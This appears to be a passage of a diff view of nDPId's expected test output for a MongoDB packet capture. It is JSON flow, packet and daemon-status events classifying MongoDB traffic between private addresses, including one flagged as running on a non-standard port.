00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1483558835050,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483558835050,"pkt":"ABsXAAIwPIqwbnfFgQABLAgARQAAPAAAQAA0BoLSCgoKDQoKCgxpidkeO6pi7TtaETWgEhagavwAAAIEBbQEAggKjPy8NBY4dS8BAwMJ"}
00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1483558834969,"flow_last_seen":1483558835131,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1483558835131,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1483459978959,"flow_last_seen":1483459979301,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1483558835131,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":13,"packets-processed":12,"total-skipped-flows":0,"total-l4-data-len":306,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1483726705497}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483726705497,"flow_last_seen":1483726705497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483726705497,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1483726705497,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483726705497,"pkt":"ABsXAAEkACKDPxfFgQAAZAgARQAAQCMwQAA9BrgMCgoKDgoKCg\/wP2mJBNDEtQAAAACwwv\/\/uGgAAAIEBWoBAwMFAQEICjJ1xd4AAAAABAIAAA=="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1483726705499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483726705499,"pkt":"ACKDPxfFABsXAAEkgQAAZAgARQAAPAAAQAA4BuBACgoKDwoKCg5pifA\/z9O+JwTQxLagUnEgLR0AAAIEBbQEAggKGQyESzJ1xd4BAwMH"}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1483726705503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1483726705503,"pkt":"ABsXAAEkACKDPxfFgQAAZAgARQAANDYCQAA9BqVGCgoKDgoKCg\/wP2mJBNDEts\/TviiAEBAavSkAAAEBCAoydcXkGQyESw=="}
00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1483726705497,"flow_last_seen":1483726705503,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1483726705503,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1483558834969,"flow_last_seen":1483558835131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1483726705503,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483726705497,"flow_last_seen":1483726705497,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483726705497,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1483726705497,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483726705497,"pkt":"ABsXAAEkACKDPxfFgQAAZAgARQAAQCMwQAA9BrgMCgoKDgoKCg\/wP2mJBNDEtQAAAACwwv\/\/uGgAAAIEBWoBAwMFAQEICjJ1xd4AAAAABAIAAA=="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1483726705499,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483726705499,"pkt":"ACKDPxfFABsXAAEkgQAAZAgARQAAPAAAQAA4BuBACgoKDwoKCg5pifA\/z9O+JwTQxLagUnEgLR0AAAIEBbQEAggKGQyESzJ1xd4BAwMH"}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1483726705503,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1483726705503,"pkt":"ABsXAAEkACKDPxfFgQAAZAgARQAANDYCQAA9BqVGCgoKDgoKCg\/wP2mJBNDEts\/TviiAEBAavSkAAAEBCAoydcXkGQyESw=="}
00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1483726705497,"flow_last_seen":1483726705503,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1483726705503,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1483558834969,"flow_last_seen":1483558835131,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1483726705503,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":17,"packets-processed":16,"total-skipped-flows":0,"total-l4-data-len":364,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":3,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":22,"global_ts_msec":1483737232974}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483737232974,"flow_last_seen":1483737232974,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483737232974,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1483737232974,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483737232974,"pkt":"ABsXAAEkLGv11hfFgQAAZAgARQAAQB7UQAA6BjnMCgoKEAoKChHInmmJ0eCpcgAAAACwAv\/\/iv8AAAIEBWoBAwMFAQEICj5g2FMAAAAABAIAAA=="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1483737232975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483737232975,"pkt":"ACKDPxfFABsXAAEkgQAAZAgARQAAPAAAQAAyBmCkCgoKEQoKChBpicie7T3P\/tHgqXOgEkXqkCgAAAIEBbQEAggKAY8GyD5g2FMBAwMI"}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1483737232979,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1483737232979,"pkt":"ABsXAAEkLGv11hfFgQAAZAgARQAANFg1QAA6BgB3CgoKEAoKChHInmmJ0eCpc+09z\/+AEBAa9MAAAAEBCAo+YNhYAY8GyA=="}
00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1483737232974,"flow_last_seen":1483737232979,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1483737232979,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1483726705497,"flow_last_seen":1483726705503,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1483737232979,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483737232974,"flow_last_seen":1483737232974,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483737232974,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1483737232974,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483737232974,"pkt":"ABsXAAEkLGv11hfFgQAAZAgARQAAQB7UQAA6BjnMCgoKEAoKChHInmmJ0eCpcgAAAACwAv\/\/iv8AAAIEBWoBAwMFAQEICj5g2FMAAAAABAIAAA=="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1483737232975,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483737232975,"pkt":"ACKDPxfFABsXAAEkgQAAZAgARQAAPAAAQAAyBmCkCgoKEQoKChBpicie7T3P\/tHgqXOgEkXqkCgAAAIEBbQEAggKAY8GyD5g2FMBAwMI"}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1483737232979,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1483737232979,"pkt":"ABsXAAEkLGv11hfFgQAAZAgARQAANFg1QAA6BgB3CgoKEAoKChHInmmJ0eCpc+09z\/+AEBAa9MAAAAEBCAo+YNhYAY8GyA=="}
00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1483737232974,"flow_last_seen":1483737232979,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1483737232979,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1483726705497,"flow_last_seen":1483726705503,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1483737232979,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":21,"packets-processed":20,"total-skipped-flows":0,"total-l4-data-len":633,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":4,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":29,"global_ts_msec":1483814916005}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483814916005,"flow_last_seen":1483814916005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483814916005,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1483814916005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483814916005,"pkt":"LGv11hfFABsXAAIwgQABLAgARQAAQILYQAA\/BvoMCgoKEgoKChP8NnUwNO8EYwAAAACwAv\/\/CB0AAAIEBVABAwMFAQEICh4cp5sAAAAABAIAAA=="}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1483814916005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483814916005,"pkt":"LGv11hfFLGv11hfMgQAAMggARQAAQILYQAA+BvsMCgoKEgoKChP8NnUwNO8EYwAAAACwAv\/\/CB0AAAIEBVABAwMFAQEICh4cp5sAAAAABAIAAA=="}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1483814916098,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483814916098,"pkt":"LGv11hfMLGv11hfFgQAAMggARQAAPAAAQAA9Bn7pCgoKEwoKChJ1MPw2EZaBKjTvBGSgEjiQwtwAAAIEBbQEAggKUsc3tB4cp5sBAwMJ"}
00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1483814916005,"flow_last_seen":1483814916108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1483814916005,"flow_last_seen":1483814916108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1483737232974,"flow_last_seen":1483737232979,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483814916005,"flow_last_seen":1483814916005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483814916005,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1483814916005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483814916005,"pkt":"LGv11hfFABsXAAIwgQABLAgARQAAQILYQAA\/BvoMCgoKEgoKChP8NnUwNO8EYwAAAACwAv\/\/CB0AAAIEBVABAwMFAQEICh4cp5sAAAAABAIAAA=="}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1483814916005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483814916005,"pkt":"LGv11hfFLGv11hfMgQAAMggARQAAQILYQAA+BvsMCgoKEgoKChP8NnUwNO8EYwAAAACwAv\/\/CB0AAAIEBVABAwMFAQEICh4cp5sAAAAABAIAAA=="}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1483814916098,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483814916098,"pkt":"LGv11hfMLGv11hfFgQAAMggARQAAPAAAQAA9Bn7pCgoKEwoKChJ1MPw2EZaBKjTvBGSgEjiQwtwAAAIEBbQEAggKUsc3tB4cp5sBAwMJ"}
00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1483814916005,"flow_last_seen":1483814916108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1483814916005,"flow_last_seen":1483814916108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1483737232974,"flow_last_seen":1483737232979,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":27,"packets-processed":27,"total-skipped-flows":0,"total-l4-data-len":706,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":37,"global_ts_msec":1483814916108}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 27/27

14
test/results/mpeg.pcap.out
View File

@@ -1,12 +1,12 @@
